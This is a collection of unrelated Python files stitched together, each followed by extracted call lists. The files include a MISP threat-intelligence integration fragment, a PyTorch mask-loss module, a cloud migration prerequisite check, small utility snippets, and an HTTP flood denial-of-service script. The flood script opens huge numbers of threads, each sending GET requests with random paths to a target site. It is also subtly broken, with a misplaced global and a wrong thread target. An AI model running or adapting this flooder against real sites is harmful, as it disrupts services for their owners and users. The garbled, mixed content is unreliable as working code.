Please make sure the UUID and tag exist.") if is_attribute: response = PYMISP.search(uuid=uuid, controller='attributes') human_readable = f'Tag {tag} has been successfully removed from the attribute {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(response), raw_response=response ) # event's uuid response = PYMISP.search(uuid=uuid) human_readable = f'Tag {tag} has been successfully removed from the event {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(response), raw_response=response ) def add_sighting(demisto_args: dict): """Adds sighting to MISP attribute """ attribute_id = demisto_args.get('id') attribute_uuid = demisto_args.get('uuid') sighting_type = demisto_args['type'] # mandatory arg att_id = attribute_id or attribute_uuid if not att_id: raise DemistoException('ID or UUID not specified') sighting_args = { 'id': attribute_id, 'uuid': attribute_uuid, 'type': SIGHTING_TYPE_NAME_TO_ID[sighting_type] } sigh_obj = MISPSighting() sigh_obj.from_dict(**sighting_args) response = PYMISP.add_sighting(sigh_obj, att_id) if response.get('message'): raise DemistoException(f"An error was occurred: {response.get('message')}") elif response.get('Sighting'): human_readable = f'Sighting \'{sighting_type}\' has been successfully added to attribute {att_id}' return CommandResults(readable_output=human_readable) raise DemistoException(f"An error was occurred: {json.dumps(response)}") def test(malicious_tag_ids, suspicious_tag_ids, attributes_limit): """ Test module. """ is_tag_list_valid(malicious_tag_ids) is_tag_list_valid(suspicious_tag_ids) if attributes_limit < 0: raise DemistoException('Attribute limit has to be a positive number.') response = PYMISP._prepare_request('GET', 'servers/getPyMISPVersion.json') if PYMISP._check_json_response(response): return 'ok' else: raise DemistoException('MISP has not connected.') def build_feed_url(demisto_args): url = demisto_args.get('feed') url = url[:-1] if url.endswith('/') else url if PREDEFINED_FEEDS.get(url): url = PREDEFINED_FEEDS[url].get('url') # type: ignore return url def add_events_from_feed(demisto_args: dict, use_ssl: bool, proxies: dict): """Gets an OSINT feed from url and publishing them to MISP urls with feeds for example: https://www.misp-project.org/feeds/ feed format must be MISP. 
""" headers = {'Accept': 'application/json'} url = build_feed_url(demisto_args) osint_url = f'{url}/manifest.json' limit = arg_to_number(demisto_args.get('limit', 2), "limit", required=True) try: uri_list = requests.get(osint_url, verify=use_ssl, headers=headers, proxies=proxies).json() events_ids = list() # type: List[Dict[str, int]] for index, uri in enumerate(uri_list, 1): response = requests.get(f'{url}/{uri}.json', verify=use_ssl, headers=headers, proxies=proxies).json() misp_new_event = MISPEvent() misp_new_event.load(response) add_event_response = PYMISP.add_event(misp_new_event) event_object = add_event_response.get('Event') if event_object and 'id' in event_object: events_ids.append({'ID': event_object['id']}) if limit == len(events_ids): break human_readable = tableToMarkdown(f'Total of {len(events_ids)} events was added to MISP.', events_ids) return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=events_ids, ) except ValueError as e: raise DemistoException(f'URL [{url}] is not a valid MISP feed. error: {e}') def add_object(event_id: str, obj: MISPObject): """Sending object to MISP and returning outputs Args: obj: object to add to MISP event_id: ID of event """ response = PYMISP.add_object(event_id, misp_object=obj) if 'errors' in response: raise DemistoException(f'Error in `{demisto.command()}` command: {response}') for ref in obj.ObjectReference: response = PYMISP.add_object_reference(ref) for attribute in response.get('Object', {}).get('Attribute', []): convert_timestamp_to_readable(attribute, None) response['Object']['timestamp'] = misp_convert_timestamp_to_date_string(response.get('Object', {}).get('timestamp')) formatted_response = replace_keys_from_misp_to_context_data(response) formatted_response.update({"ID": event_id}) human_readable = f'Object has been added to MISP event ID {event_id}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=formatted_response, ) def add_file_object(demisto_args: dict): entry_id = demisto_args.get('entry_id') event_id = demisto_args.get('event_id') file_path = demisto.getFilePath(entry_id).get('path') obj = FileObject(file_path) return add_object(event_id, obj) def add_domain_object(demisto_args: dict): """Adds a domain object to MISP domain-ip description: https://www.misp-project.org/objects.html#_domain_ip """ text = demisto_args.get('text') event_id = demisto_args.get('event_id') domain = demisto_args.get('name') obj = MISPObject('domain-ip') ips = argToList(demisto_args.get('ip')) for ip in ips: obj.add_attribute('ip', value=ip) obj.add_attribute('domain', value=domain) if text: obj.add_attribute('text', value=text) return add_object(event_id, obj) def add_url_object(demisto_args: dict): """Building url object in MISP scheme Scheme described https://www.misp-project.org/objects.html#_url """ url_args = [ 'text', 'last_seen', 'first_seen' ] event_id = demisto_args.get('event_id') url = demisto_args.get('url') url_parse = urlparse(url) url_obj = [{'url': url}] url_obj.extend({'scheme': url_parse.scheme}) if url_parse.scheme else None url_obj.append({'resource_path': url_parse.path}) if url_parse.path else None url_obj.append({'query_string': url_parse.query}) if url_parse.query else None url_obj.append({'domain': url_parse.netloc}) if url_parse.netloc else None url_obj.append({'fragment': url_parse.fragment}) if url_parse.fragment else None url_obj.append({'port': url_parse.port}) if url_parse.port else None 
url_obj.append( {'credential': (url_parse.username, url_parse.password)}) if url_parse.username and url_parse.password else None url_obj.extend(convert_arg_to_misp_args(demisto_args, url_args)) g_object = build_generic_object('url', url_obj) return add_object(event_id, g_object) def add_generic_object_command(demisto_args: dict): event_id = demisto_args.get('event_id') template = demisto_args.get('template') attributes = demisto_args.get('attributes').replace("'", '"') try: args = json.loads(attributes) if not isinstance(args, list): args = dict_to_generic_object_format(args) obj = build_generic_object(template, args) return add_object(event_id, obj) except ValueError as e: raise DemistoException( f'`attribute` parameter could not be decoded, may not a valid JSON\nattribute: {attributes}', str(e)) def convert_arg_to_misp_args(demisto_args, args_names): return [{arg.replace('_', '-'): demisto_args.get(arg)} for arg in args_names if demisto_args.get(arg)] def add_ip_object(demisto_args: dict): event_id = demisto_args.get('event_id') ip_object_args = [ 'dst_port', 'src_port', 'domain', 'hostname', 'ip_src', 'ip_dst' ] # converting args to MISP's arguments types misp_attributes_args = convert_arg_to_misp_args(demisto_args, ip_object_args) ips = argToList(demisto_args.get('ip')) for ip in ips: misp_attributes_args.append({'ip': ip}) if misp_attributes_args: non_req_args = [ 'first_seen', 'last_seen', ] misp_attributes_args.extend(convert_arg_to_misp_args(demisto_args, non_req_args)) misp_attributes_args.append({'text': demisto_args.get('comment')}) if demisto_args.get('comment') else None obj = build_generic_object('ip-port', misp_attributes_args) return add_object(event_id, obj) else: raise DemistoException( f'None of required arguments presents. command {demisto.command()} requires one of {ip_object_args}') def handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids): """ Gets 2 sets which include tag ids. If there is an id that exists in both sets, it will be removed from the suspicious tag ids set and will be stayed only in the malicious one (as a tag that was configured to be malicious is stronger than recognised as suspicious). 
""" common_ids = set(malicious_tag_ids) & set(suspicious_tag_ids) suspicious_tag_ids = {tag_id for tag_id in suspicious_tag_ids if tag_id not in common_ids} return malicious_tag_ids, suspicious_tag_ids def is_tag_list_valid(tag_ids): """Gets a list ot tag ids (each one is str), and verify all the tags are valid positive integers.""" for tag in tag_ids: try: tag = int(tag) if tag <= 0: raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.") except ValueError: raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.") def create_updated_attribute_instance(demisto_args: dict, attribute_uuid: str) -> MISPAttribute: attribute_type = demisto_args.get('type') distribution = demisto_args.get('distribution') category = demisto_args.get('category') comment = demisto_args.get('comment') value = demisto_args.get('value') first_seen = demisto_args.get('first_seen') last_seen = demisto_args.get('last_seen') attribute_instance = MISPAttribute() attribute_instance.uuid = attribute_uuid if attribute_type: attribute_instance.type = attribute_type if distribution: attribute_instance.distribution = MISP_DISTRIBUTION_TO_IDS[distribution] if category: attribute_instance.category = category if value: attribute_instance.value = value if comment: attribute_instance.comment = comment if first_seen: attribute_instance.first_seen = first_seen if last_seen: attribute_instance.last_seen = last_seen return attribute_instance def update_attribute_command(demisto_args: dict) -> CommandResults: attribute_uuid = demisto_args.get('attribute_uuid') attribute_instance = create_updated_attribute_instance(demisto_args, attribute_uuid) attribute_instance_response = PYMISP.update_attribute(attribute=attribute_instance, attribute_id=attribute_uuid) if isinstance(attribute_instance_response, dict) and attribute_instance_response.get('errors'): raise DemistoException(attribute_instance_response.get('errors')) human_readable = f"## MISP update attribute\nAttribute: {attribute_uuid} was updated.\n" attribute = attribute_instance_response.get('Attribute') convert_timestamp_to_readable(attribute, None) parsed_attribute_data = replace_keys_from_misp_to_context_data(attribute) return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=parsed_attribute_data, ) def main(): params = demisto.params() malicious_tag_ids = argToList(params.get('malicious_tag_ids')) suspicious_tag_ids = argToList(params.get('suspicious_tag_ids')) reliability = params.get('integrationReliability', 'B - Usually reliable') if DBotScoreReliability.is_valid_type(reliability): reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability) else: Exception("MISP V3 error: Please provide a valid value for the Source Reliability parameter") attributes_limit = arg_to_number(params.get('attributes_limit', 20), "attributes_limit", required=True) command = demisto.command() demisto.debug(f'[MISP V3]: command is {command}') args = demisto.args() try: malicious_tag_ids, suspicious_tag_ids = handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids) if command == 'test-module': return_results(test(malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids, attributes_limit=attributes_limit)) elif command == 'misp-create-event': return_results(create_event_command(args)) elif command == 'misp-add-attribute': return_results(add_attribute(demisto_args=args)) elif command == 'misp-search-events': 
return_results(search_events(args)) elif command == 'misp-search-attributes': return_results(search_attributes(args)) elif command == 'misp-delete-event': return_results(delete_event(args)) elif command == 'misp-add-sighting': return_results(add_sighting(args)) elif command == 'misp-add-tag-to-event': return_results(add_tag(args)) elif command == 'misp-add-tag-to-attribute': return_results(add_tag(demisto_args=args, is_attribute=True)) elif command == 'misp-remove-tag-from-event': return_results(remove_tag(args)) elif command == 'misp-remove-tag-from-attribute': return_results(remove_tag(demisto_args=args, is_attribute=True)) elif command == 'misp-add-events-from-feed': return_results(add_events_from_feed(demisto_args=args, use_ssl=VERIFY, proxies=PROXIES)) elif command == 'file': return_results( generic_reputation_command(args, 'file', 'FILE', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'url': return_results( generic_reputation_command(args, 'url', 'URL', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'ip': return_results( generic_reputation_command(args, 'ip', 'IP', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'domain': return_results( generic_reputation_command(args, 'domain', 'DOMAIN', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'email': return_results(generic_reputation_command(args, 'email', 'EMAIL', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'misp-add-file-object': return_results(add_file_object(args)) elif command == 'misp-add-domain-object': return_results(add_domain_object(args)) elif command == 'misp-add-url-object': return_results(add_url_object(args)) elif command == 'misp-add-ip-object': return_results(add_ip_object(args)) elif command == 'misp-add-object': return_results(add_generic_object_command(args)) elif command == 'misp-update-attribute': return_results(update_attribute_command(args)) except PyMISPError as e: return_error(e.message) except Exception as e: return_error(str(e)) if __name__ in ['__main__', '__builtin__', 'builtins']: main()
[ "pymisp.tools.FileObject", "pymisp.tools.GenericObjectGenerator", "urllib.parse.urlparse", "urllib3.disable_warnings", "pymisp.MISPEvent", "pymisp.ExpandedPyMISP", "copy.deepcopy", "pymisp.MISPObject", "pymisp.MISPAttribute", "pymisp.MISPSighting" ]
[((1129, 1155), 'urllib3.disable_warnings', 'urllib3.disable_warnings', ([], {}), '()\n', (1153, 1155), False, 'import urllib3\n'), ((1584, 1659), 'pymisp.ExpandedPyMISP', 'ExpandedPyMISP', ([], {'url': 'MISP_URL', 'key': 'MISP_API_KEY', 'ssl': 'VERIFY', 'proxies': 'PROXIES'}), '(url=MISP_URL, key=MISP_API_KEY, ssl=VERIFY, proxies=PROXIES)\n', (1598, 1659), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((7707, 7744), 'pymisp.tools.GenericObjectGenerator', 'GenericObjectGenerator', (['template_name'], {}), '(template_name)\n', (7729, 7744), False, 'from pymisp.tools import GenericObjectGenerator\n'), ((12553, 12581), 'copy.deepcopy', 'copy.deepcopy', (['misp_response'], {}), '(misp_response)\n', (12566, 12581), False, 'import copy\n'), ((17464, 17475), 'pymisp.MISPEvent', 'MISPEvent', ([], {}), '()\n', (17473, 17475), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((33799, 33822), 'copy.deepcopy', 'copy.deepcopy', (['response'], {}), '(response)\n', (33812, 33822), False, 'import copy\n'), ((40516, 40539), 'copy.deepcopy', 'copy.deepcopy', (['response'], {}), '(response)\n', (40529, 40539), False, 'import copy\n'), ((47985, 47999), 'pymisp.MISPSighting', 'MISPSighting', ([], {}), '()\n', (47997, 47999), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((52082, 52103), 'pymisp.tools.FileObject', 'FileObject', (['file_path'], {}), '(file_path)\n', (52092, 52103), False, 'from pymisp.tools import FileObject\n'), ((52438, 52461), 'pymisp.MISPObject', 'MISPObject', (['"""domain-ip"""'], {}), "('domain-ip')\n", (52448, 52461), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((53044, 53057), 'urllib.parse.urlparse', 'urlparse', (['url'], {}), '(url)\n', (53052, 53057), False, 'from urllib.parse import urlparse\n'), ((57209, 57224), 'pymisp.MISPAttribute', 'MISPAttribute', ([], {}), '()\n', (57222, 57224), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((50039, 50050), 'pymisp.MISPEvent', 'MISPEvent', ([], {}), '()\n', (50048, 50050), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n')]
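As a quick sanity check, the argument-mapping helper defined in the sample above can be exercised in isolation. This is a minimal sketch with invented argument names, not output captured from the integration:

def convert_arg_to_misp_args(demisto_args, args_names):
    # Same helper as in the sample: renames snake_case args to MISP's dashed keys
    # and drops arguments that were not supplied.
    return [{arg.replace('_', '-'): demisto_args.get(arg)}
            for arg in args_names if demisto_args.get(arg)]


demo_args = {'ip_src': '10.0.0.1', 'dst_port': '443', 'comment': ''}
print(convert_arg_to_misp_args(demo_args, ['ip_src', 'dst_port', 'comment']))
# [{'ip-src': '10.0.0.1'}, {'dst-port': '443'}]  -- the empty 'comment' is filtered out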
import torch from torch.nn import functional as F from torch import nn from torch.autograd import Variable from adet.utils.comm import compute_locations, aligned_bilinear def dice_coefficient(x, target): eps = 1e-5 n_inst = x.size(0) x = x.reshape(n_inst, -1) target = target.reshape(n_inst, -1) intersection = (x * target).sum(dim=1) union = (x ** 2.0).sum(dim=1) + (target ** 2.0).sum(dim=1) + eps loss = 1. - (2 * intersection / union) return loss def lovasz_grad(gt_sorted): """ Computes gradient of the Lovasz extension w.r.t sorted errors See Alg. 1 in paper """ p = len(gt_sorted) gts = gt_sorted.sum() intersection = gts - gt_sorted.float().cumsum(0) union = gts + (1 - gt_sorted.float()).cumsum(0) jaccard = 1. - intersection / union if p > 1: # cover 1-pixel case jaccard[1:p] = jaccard[1:p] - jaccard[0:-1] return jaccard def lovasz_hinge(logits, labels): """ Binary Lovasz hinge loss logits: [P] Variable, logits at each prediction (between -\infty and +\infty) labels: [P] Tensor, binary ground truth labels (0 or 1) """ if len(labels) == 0: # only void pixels, the gradients should be 0 return logits.sum() * 0. signs = 2. * labels.float() - 1. errors = (1. - logits * Variable(signs)) errors_sorted, perm = torch.sort(errors, dim=0, descending=True) perm = perm.data gt_sorted = labels[perm] grad = lovasz_grad(gt_sorted) loss = torch.dot(F.relu(errors_sorted), Variable(grad)) return loss def lovasz_loss(x, target): eps = 1e-6 n_inst = x.size(0) x = x.reshape(n_inst, -1) target = target.reshape(n_inst, -1) x = torch.clamp(x, min=eps, max=1-eps) x = torch.log(x) - torch.log(1 - x) losses = [] for i in range(n_inst): losses.append(lovasz_hinge(x[i], target[i])) loss = torch.stack(losses) return loss def build_mask_pred(cfg): return MaskPred(cfg) class MaskPred(nn.Module): def __init__(self, cfg): super(MaskPred, self).__init__() self.in_channels = cfg.MODEL.EMBEDMASK.MASK_BRANCH.OUT_CHANNELS self.mask_out_stride = cfg.MODEL.EMBEDMASK.MASK_OUT_STRIDE soi = cfg.MODEL.FCOS.SIZES_OF_INTEREST self.register_buffer("sizes_of_interest", torch.tensor(soi + [soi[-1] * 2])) self.register_buffer("_iter", torch.zeros([1])) self.mask_loss_type = cfg.MODEL.EMBEDMASK.MASK_LOSS_TYPE self.mask_loss_alpha = cfg.MODEL.EMBEDMASK.MASK_LOSS_ALPHA def __call__(self, pixel_embed, mask_feat_stride, pred_instances, gt_instances=None): if self.training: self._iter += 1 gt_inds = pred_instances.gt_inds gt_bitmasks = torch.cat([per_im.gt_bitmasks for per_im in gt_instances]) gt_bitmasks = gt_bitmasks[gt_inds].unsqueeze(dim=1).to(dtype=pixel_embed.dtype) losses = {} if len(pred_instances) == 0: dummy_loss = pixel_embed.sum() * 0 + pred_instances.proposal_embed.sum() * 0 + pred_instances.proposal_margin.sum() * 0 losses["loss_mask"] = dummy_loss else: mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride) if self.mask_loss_type == "Dice": mask_losses = dice_coefficient(mask_prob, gt_bitmasks) loss_mask = mask_losses.mean() elif self.mask_loss_type == "Lovasz": mask_losses = lovasz_loss(mask_prob, gt_bitmasks) loss_mask = mask_losses.mean() losses["loss_mask"] = loss_mask * self.mask_loss_alpha return losses else: if len(pred_instances) > 0: mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride) pred_instances.pred_global_masks = mask_prob return pred_instances def compute_mask_prob(self, instances, pixel_embed, mask_feat_stride): proposal_embed = instances.proposal_embed proposal_margin = instances.proposal_margin im_inds = instances.im_inds dim, m_h, m_w = 
pixel_embed.shape[-3:] obj_num = proposal_embed.shape[0] pixel_embed = pixel_embed.permute(0, 2, 3, 1)[im_inds] proposal_embed = proposal_embed.view(obj_num, 1, 1, -1).expand(-1, m_h, m_w, -1) proposal_margin = proposal_margin.view(obj_num, 1, 1, dim).expand(-1, m_h, m_w, -1) mask_var = (pixel_embed - proposal_embed) ** 2 mask_prob = torch.exp(-torch.sum(mask_var * proposal_margin, dim=3)) assert mask_feat_stride >= self.mask_out_stride assert mask_feat_stride % self.mask_out_stride == 0 mask_prob = aligned_bilinear(mask_prob.unsqueeze(1), int(mask_feat_stride / self.mask_out_stride)) return mask_prob
[ "torch.sort", "torch.log", "torch.stack", "torch.tensor", "torch.cat", "torch.sum", "torch.nn.functional.relu", "torch.autograd.Variable", "torch.zeros", "torch.clamp" ]
[((1370, 1412), 'torch.sort', 'torch.sort', (['errors'], {'dim': '(0)', 'descending': '(True)'}), '(errors, dim=0, descending=True)\n', (1380, 1412), False, 'import torch\n'), ((1719, 1755), 'torch.clamp', 'torch.clamp', (['x'], {'min': 'eps', 'max': '(1 - eps)'}), '(x, min=eps, max=1 - eps)\n', (1730, 1755), False, 'import torch\n'), ((1903, 1922), 'torch.stack', 'torch.stack', (['losses'], {}), '(losses)\n', (1914, 1922), False, 'import torch\n'), ((1518, 1539), 'torch.nn.functional.relu', 'F.relu', (['errors_sorted'], {}), '(errors_sorted)\n', (1524, 1539), True, 'from torch.nn import functional as F\n'), ((1541, 1555), 'torch.autograd.Variable', 'Variable', (['grad'], {}), '(grad)\n', (1549, 1555), False, 'from torch.autograd import Variable\n'), ((1762, 1774), 'torch.log', 'torch.log', (['x'], {}), '(x)\n', (1771, 1774), False, 'import torch\n'), ((1777, 1793), 'torch.log', 'torch.log', (['(1 - x)'], {}), '(1 - x)\n', (1786, 1793), False, 'import torch\n'), ((1327, 1342), 'torch.autograd.Variable', 'Variable', (['signs'], {}), '(signs)\n', (1335, 1342), False, 'from torch.autograd import Variable\n'), ((2328, 2361), 'torch.tensor', 'torch.tensor', (['(soi + [soi[-1] * 2])'], {}), '(soi + [soi[-1] * 2])\n', (2340, 2361), False, 'import torch\n'), ((2402, 2418), 'torch.zeros', 'torch.zeros', (['[1]'], {}), '([1])\n', (2413, 2418), False, 'import torch\n'), ((2770, 2828), 'torch.cat', 'torch.cat', (['[per_im.gt_bitmasks for per_im in gt_instances]'], {}), '([per_im.gt_bitmasks for per_im in gt_instances])\n', (2779, 2828), False, 'import torch\n'), ((4622, 4666), 'torch.sum', 'torch.sum', (['(mask_var * proposal_margin)'], {'dim': '(3)'}), '(mask_var * proposal_margin, dim=3)\n', (4631, 4666), False, 'import torch\n')]
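Assuming the loss helpers above (dice_coefficient, lovasz_loss) are in scope, a minimal sketch with dummy tensors shows the expected per-instance output shapes; the sizes are arbitrary:

import torch

# 4 hypothetical instances with 32x32 predicted mask probabilities in [0, 1]
# and binary ground-truth masks.
mask_prob = torch.rand(4, 32, 32)
gt_masks = (torch.rand(4, 32, 32) > 0.5).float()

print(dice_coefficient(mask_prob, gt_masks).shape)  # torch.Size([4]), one loss per instance
print(lovasz_loss(mask_prob, gt_masks).shape)     # torch.Size([4]), one loss per instance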
# Copyright 2016 Mirantis Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import getpass import logging from cloudferry.lib.base import exception from cloudferry.lib.base.action import action from cloudferry.lib.utils import local from cloudferry.lib.utils import remote_runner LOG = logging.getLogger(__name__) class CheckVMAXPrerequisites(action.Action): """This verifies prerequisites required for NFS to VMAX iSCSI cinder volume migration""" def _iscsiadm_is_installed_locally(self): LOG.info("Checking if iscsiadm tool is installed") try: local.run('iscsiadm --help &>/dev/null') except local.LocalExecutionFailed: msg = ("iscsiadm is not available on the local host. Please " "install iscsiadm tool on the node you running on or " "choose other cinder backend for migration. iscsiadm is " "mandatory for migrations with EMC VMAX cinder backend") LOG.error(msg) raise exception.AbortMigrationError(msg) def _check_local_sudo_password_set(self): current_user = getpass.getuser() if current_user != 'root' and \ self.cfg.migrate.local_sudo_password is None: try: local.sudo('ls') except local.LocalExecutionFailed: msg = ("CloudFerry is running as '{user}' user, but " "passwordless sudo does not seem to be configured on " "current host. Please either specify password in " "`local_sudo_password` config option, or run " "CloudFerry as root user.").format(user=current_user) LOG.error(msg) raise exception.AbortMigrationError(msg) def _ssh_connectivity_between_controllers(self): src_host = self.cfg.src.ssh_host src_user = self.cfg.src.ssh_user dst_host = self.cfg.dst.ssh_host dst_user = self.cfg.dst.ssh_user LOG.info("Checking ssh connectivity between '%s' and '%s'", src_host, dst_host) rr = remote_runner.RemoteRunner(src_host, src_user) ssh_opts = ('-o UserKnownHostsFile=/dev/null ' '-o StrictHostKeyChecking=no') cmd = "ssh {opts} {user}@{host} 'echo ok'".format(opts=ssh_opts, user=dst_user, host=dst_host) try: rr.run(cmd) except remote_runner.RemoteExecutionError: msg = ("No ssh connectivity between source host '{src_host}' and " "destination host '{dst_host}'. Make sure you have keys " "and correct configuration on these nodes. To verify run " "'{ssh_cmd}' from '{src_host}' node") msg = msg.format(src_host=src_host, dst_host=dst_host, ssh_cmd=cmd) LOG.error(msg) raise exception.AbortMigrationError(msg) def run(self, **kwargs): if self.cfg.dst_storage.backend != 'iscsi-vmax': return self._iscsiadm_is_installed_locally() self._ssh_connectivity_between_controllers() self._check_local_sudo_password_set()
[ "logging.getLogger", "cloudferry.lib.utils.remote_runner.RemoteRunner", "cloudferry.lib.utils.local.sudo", "cloudferry.lib.base.exception.AbortMigrationError", "cloudferry.lib.utils.local.run", "getpass.getuser" ]
[((789, 816), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (806, 816), False, 'import logging\n'), ((1627, 1644), 'getpass.getuser', 'getpass.getuser', ([], {}), '()\n', (1642, 1644), False, 'import getpass\n'), ((2639, 2685), 'cloudferry.lib.utils.remote_runner.RemoteRunner', 'remote_runner.RemoteRunner', (['src_host', 'src_user'], {}), '(src_host, src_user)\n', (2665, 2685), False, 'from cloudferry.lib.utils import remote_runner\n'), ((1092, 1132), 'cloudferry.lib.utils.local.run', 'local.run', (['"""iscsiadm --help &>/dev/null"""'], {}), "('iscsiadm --help &>/dev/null')\n", (1101, 1132), False, 'from cloudferry.lib.utils import local\n'), ((1522, 1556), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', (['msg'], {}), '(msg)\n', (1551, 1556), False, 'from cloudferry.lib.base import exception\n'), ((1780, 1796), 'cloudferry.lib.utils.local.sudo', 'local.sudo', (['"""ls"""'], {}), "('ls')\n", (1790, 1796), False, 'from cloudferry.lib.utils import local\n'), ((3518, 3552), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', (['msg'], {}), '(msg)\n', (3547, 3552), False, 'from cloudferry.lib.base import exception\n'), ((2266, 2300), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', (['msg'], {}), '(msg)\n', (2295, 2300), False, 'from cloudferry.lib.base import exception\n')]
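The availability probe in the sample goes through cloudferry's local.run wrapper; the same idea can be sketched with only the standard library, using shutil.which as a stand-in for actually executing the tool:

import shutil


def check_iscsiadm_installed():
    # Hypothetical stand-in for local.run('iscsiadm --help &>/dev/null'):
    # verify the binary is on PATH instead of running it.
    if shutil.which('iscsiadm') is None:
        raise RuntimeError(
            'iscsiadm is not available on the local host; install it or '
            'choose another cinder backend for the migration.')


check_iscsiadm_installed()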
import random import socket import string import sys import threading import time def attack(host: str, port: int = 80, request_count: int = 10 ** 10) -> None: # Threading support thread_num = 0 thread_num_mutex = threading.Lock() # Utility function def print_status() -> None: global thread_num thread_num_mutex.acquire(True) thread_num += 1 print(f"\n[{time.ctime().split(' ')[3]}] [{str(thread_num)}] Under progress...") thread_num_mutex.release() def generate_url_path(): msg = str(string.ascii_letters + string.digits + string.punctuation) data = "".join(random.sample(msg, 5)) return data def attack_() -> None: print_status() url_path = generate_url_path() dos = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: dos.connect((ip, port)) msg = f"GET /{url_path} HTTP/1.1\nHost: {host}\n\n" dos.send(msg.encode()) except socket.error: print(f"[ERROR] Site may be down | {socket.error}") finally: dos.shutdown(socket.SHUT_RDWR) dos.close() try: host = host.replace("https://", "").replace("http://", "").replace("www.", "") ip = socket.gethostbyname(host) except socket.gaierror: print("[ERROR] Make sure you entered a correct website!") sys.exit(2) all_threads = [] for i in range(request_count): t1 = threading.Thread(target=attack) t1.start() all_threads.append(t1) time.sleep(0.01) for current_thread in all_threads: current_thread.join()
[ "socket.gethostbyname", "random.sample", "time.ctime", "socket.socket", "threading.Lock", "time.sleep", "sys.exit", "threading.Thread" ]
[((228, 244), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (242, 244), False, 'import threading\n'), ((794, 843), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (807, 843), False, 'import socket\n'), ((1281, 1307), 'socket.gethostbyname', 'socket.gethostbyname', (['host'], {}), '(host)\n', (1301, 1307), False, 'import socket\n'), ((1493, 1524), 'threading.Thread', 'threading.Thread', ([], {'target': 'attack'}), '(target=attack)\n', (1509, 1524), False, 'import threading\n'), ((1584, 1600), 'time.sleep', 'time.sleep', (['(0.01)'], {}), '(0.01)\n', (1594, 1600), False, 'import time\n'), ((646, 667), 'random.sample', 'random.sample', (['msg', '(5)'], {}), '(msg, 5)\n', (659, 667), False, 'import random\n'), ((1410, 1421), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (1418, 1421), False, 'import sys\n'), ((411, 423), 'time.ctime', 'time.ctime', ([], {}), '()\n', (421, 423), False, 'import time\n')]
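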
import random


class Yolov3(object):
    def __init__(self):
        self.num = 0
        self.input_size = [8, 16, 32]

    def __iter__(self):
        return self

    def __next__(self):
        a = random.choice(self.input_size)
        self.num = self.num + 1
        if self.num < 3:
            return a
        else:
            raise StopIteration


yolo = Yolov3()
for data in yolo:
    print(data)
[ "random.choice" ]
[((161, 191), 'random.choice', 'random.choice', (['self.input_size'], {}), '(self.input_size)\n', (174, 191), False, 'import random\n')]
import googlemaps

gmaps = googlemaps.Client(key='google_key')


def get_markers(address):
    geocode_result = gmaps.geocode(address)
    return geocode_result[0]['geometry']['location']
[ "googlemaps.Client" ]
[((27, 62), 'googlemaps.Client', 'googlemaps.Client', ([], {'key': '"""google_key"""'}), "(key='google_key')\n", (44, 62), False, 'import googlemaps\n')]
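A hedged usage sketch for the helper above; the address is arbitrary and 'google_key' must be replaced with a real API key for the call to succeed:

# Google's geocoding response stores coordinates under geometry.location.
location = get_markers('1600 Amphitheatre Parkway, Mountain View, CA')
print(location['lat'], location['lng'])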
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

# Imports
import os
import numpy as np
import tensorflow as tf


def run(model, X, Y, optimizer=None, nb_epochs=30, nb_batches=128):
    """ Run the estimator """
    if optimizer is None:
        # Note: tf.keras.optimizers.SGD is the correct namespace
        # (tf.keras.estimators.SGD does not exist).
        optimizer = tf.keras.optimizers.SGD(
            lr=0.0009, decay=1e-5, momentum=0.9, nesterov=True)

    # 1. Compile the model
    model.compile(
        optimizer=optimizer,
        loss='categorical_crossentropy',
        metrics=['accuracy'])

